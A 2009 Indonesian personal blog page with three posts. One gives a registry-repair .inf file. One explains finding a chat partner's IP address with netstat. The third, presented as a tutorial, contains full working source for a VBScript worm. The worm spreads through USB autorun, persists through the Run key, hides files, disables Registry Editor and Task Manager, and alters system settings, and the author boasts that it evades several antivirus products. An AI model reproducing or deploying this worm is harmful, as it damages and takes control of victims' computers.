Jumat, 26 Juni 2009

Buka regedit.. keluar notepad isi nya bahasa planet ? jangan bingung...



Sering sekali gw alamin semua waktu mau buka regedit ternyata muncul notepad dengan huruf-huruf mesin yang aneh.. jangan bingung.. ada cara jitu mengatasinya :
Copy paste text dibawah ini di notepad dan simpan jadi file hapus-notepad.inf


[Version]

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"


[del]
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Msconfig.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe



Cara pakenya... klik kanan terus install... semoga beres masalah anda

Diposting oleh di Tidak ada komentar:

Melihat IP teman chatting kita di Yahoo Messengger


Hal ini mungkin saja terjadi apabila kita chat menggunakan IRC “Internet Relay Chat”. Selama lawan chat tidak menyembunyikan IP nya kita dapat mengetahui berapa IP dari lawan chat kita. Namun apabila dia tetap menyembunyikan, kita dapat menggunakan perintah “/whois [nick_name]. Namun kali ini kita akan coba implementasikan di Yahoo Chat, tidak menjamin berhasil namun boleh di coba …. begini

Kadang kala atau bahkan sering kali, terutama bagi pecinta Private Message (PM), mengetahui lokasi teman chat anda bukanlah hal yang mudah. Chatter lebih suka menyembunyikan keberadaan dirinya atau lokasi dimana dia melakukan chat, apabila ia merasa belum cukup dekat dengan teman chatnya. Terutama sekali chatter indonesia yang berada di luar negeri. Atau anda bisa mengetahui IP seseorang yang sedang melakukan kegiatan booter kepada anda.

Namun persoalan ini bukanlah persoalan yang sulit. Mengetahui dari mana seorang chatter melakukan aktivitas perchattingannya dapat diketahui lewat Internet Protocolnya. Jika di wordpress, setiap comment dicatat Internet Protocolnya, sehingga memudahkan kita untuk menyelidiki keberadaan lokasi para komentator kita, tidak demikian halnya dengan Yahoo Messenger. Lalu apa yang bisa kita lakukan?

Jika chatter tidak melakukan aktivitas IP hider (menggunakan software tertentu) atau tidak menggunakan Proxy, maka anda dapat melakukan langkah berikut untuk mengetahui Internet Protocol Seseorang. Namun apabila chatter menggunakan Proxy, maka IP proxy tersebutlah yang terdeteksi.

Pertama. Cara paling mudah adalah dengan menggunakan tool software IP Grabber atau IP checker. Dengan menggunakan software ini anda bisa dengan mudah mengetahui IP seseorang. Tetapi tanpa menggunakan tool ini pun sebenarnya anda bisa dengan mudah mengetahui IP teman chatter anda.

Kedua. Bukalah Command Prompt (pengguna windows). Bisa dilakukan lewat cara ini:

Start >> Run >> Ketik Cmd >> Enter

Atau lewat:

Start >> All Programs >> Accessories >> Command Prompt

Nah dari sini akan muncul jendela Command Prompt. Kemudian ketikkan di dalamnya “Netstat” dan tekan Enter. Seharusnya setelah anda melakukan tindakan ini akan muncul di jendela Command Prompt tulisan Active Connection. Dan dibawahnya terdapat listing “Proto” , “Lokal Address”, “Foreign Address”, dan “State”.

Active Connection menunjukkan bahwa dibawahnya merupakan koneksi-koneksi anda yang aktif. Sedangkan Proto mengindikasikan Protocol yang anda gunakan. Lokal Address menunjukkan Internet Protocol di jaringan anda. Foreign Address menunjukkan IP koneksi internet yang masuk dan port yang digunakan.

Dengan mengetahui IP seseorang anda juga bisa mengetahui dari mana di chatting. Anda juga bisa mengetahui dari mana seseorang melakukan serangan boot. Beberapa hal yang perlu diperhatikan adalah alamat port di Yahoo Messenger. Remote Port 5050 biasanya digunakan untuk keperluan chatting seperti Private Messege. Remote Port 5000 atau 5001 biasanya untuk voice chat. Keperluan mengirim file bisanya ada di Remote Port 80 atau 81. Untuk keperluan webcam di Remote Port 5100.

gw belum mengecek kembali port-port diatas apakah masih digunakan lagi oleh Yahoo. Ada kemungkinan Yahoo webcam Remote Port telah berubah sehingga menyebabkan Y Intai atau YahcamView tidak bisa digunakan. Coba cek alamat webcam port via YM biasa. Kemudiah ubah settingan anda di Y Intai dengan Remote Port yang baru. Maaf gw belum bisa mencoba, coba kalau ada teman2 yang bisa, gw mohon sharenya. Trim’s
Diposting oleh di Tidak ada komentar:

Belajar membuat virus VBS dengan Notepad


Iseng-iseng mencolok Flash Disc tiba-tiba nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini gw beri nama Ў°BELAJAR.VBSЎ±. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,lagibelajar,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe belajar.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- belajar.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “)
tf.attributes = 39
‘//–Buat Autorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\belajar.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “)
tf.attributes = 39

‘//–Buat Autorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//
set lagibelajar = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi belajar Mania–//
lagibelajar.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” belajar MANIA “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm belajar. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- belajar.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “belajar”
lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”belajarMania”

‘//–LOOPing–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih Ў°All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..heЎ­Virus Worm ini memang bukan murni dari pemikiran gw sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
Diposting oleh di 2 komentar:
Langganan: Postingan (Atom)

LoseHeart13

Bila cinta menghampirimu sayangilah cinta, cintailah cinta, Tapi bila cinta sudah menjauhimu jangan kau putus aza untuk mengejarnya


Aku adalah masalalu

aku adalah masalalu sebuah kepahitan yang terlahir dari sebuah cinta aku adalah kesengsaraan penderitaan yang hidup dalam jiwa yang hitam ia adalah sebuah cinta yang terlupakan dan aku adalah sebuah kesenangan yang tertinggalkan cinta telah mengubah jalan hidupku menjadi sebuah perjalanan panjang dan ia telah merubah kebahagiaanku menjadi sebuah penderitaan usai sudah semua kenangan itu, aku bahagia dapat melepaskanmu usai sudah semua dustamu, karna waktu telah mengatakan padaku tentang dustamu dan usai sudah semua cinta yang menyakitkan ini aku lelah berada dalam dustamu, aku senang berada dalam kesendirianku aku bahagia dengan kesepianku. menikmati kesendirianku lagi menemaniku..